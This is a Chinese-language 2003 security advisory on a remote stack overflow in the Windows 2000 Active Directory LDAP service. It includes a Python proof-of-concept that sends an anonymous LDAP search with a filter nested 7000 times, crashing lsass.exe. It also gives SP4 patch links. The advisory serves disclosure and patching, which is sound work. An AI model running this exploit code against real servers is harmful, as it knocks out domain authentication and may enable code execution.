Microsoft Windows 2000活动目录远程堆栈溢出漏洞发布时间:2003-07-02 更新时间:2003-07-02 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:7930 受影响系统 Microsoft Windows 2000 Advanced Server SP3详细描述 活动目录是W2K组件。由活动目录提供的目录服务基于LDAP协议,因此活动目录对象可以通过使用LDAP协议存储和获得。 当使用1000个“AND”的LDAP 3搜索请求发送给服务器,会导致Lsaas.exe服务崩溃,攻击者只要建立'search request'请求给目录服务器,可能导致任意代码执行。 测试代码 Python script演示如下: ------------------------------------ class ActiveDirectoryDOS( Ldap ): def __init__(self): self._s = None self.host = '192.168.0.1' self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com' self.port = 389 self.buffer = '' self.msg_id = 1 Ldap.__init__() def generateFilter_BinaryOp( self, filter ): filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode() filterBuffer = self.encapsulateHeader( filter[0], filterBuffer ) return filterBuffer def generateFilter_RecursiveBinaryOp( self, filter, numTimes): simpleBinOp = self.generateFilter_BinaryOp( filter ) filterBuffer = simpleBinOp for cnt in range( 0, numTimes ): filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp ) return filterBuffer def searchSub( self, filterBuffer ): self.bindRequest() self.searchRequest( filterBuffer ) def run(self, host = '', basedn = '', name = '' ): # the machine must not exist machine_name = 'xaxax' filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name) # execute the anonymous query print 'executing query' filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 ) self.searchSub( filterBuffer ) ------------------------------------ 解决方案 补丁下载: Microsoft Windows 2000 Server SP3: Microsoft Upgrade Windows 2000 SP4 http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp Microsoft Windows 2000 Advanced Server SP3: Microsoft Upgrade Windows 2000 SP4 http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp 相关信息 参考:http://www.securityfocus.com/advisories/5544 相关主页:http://www.microsoft.com/windows2000/technologies/directory/ad/default.asp |
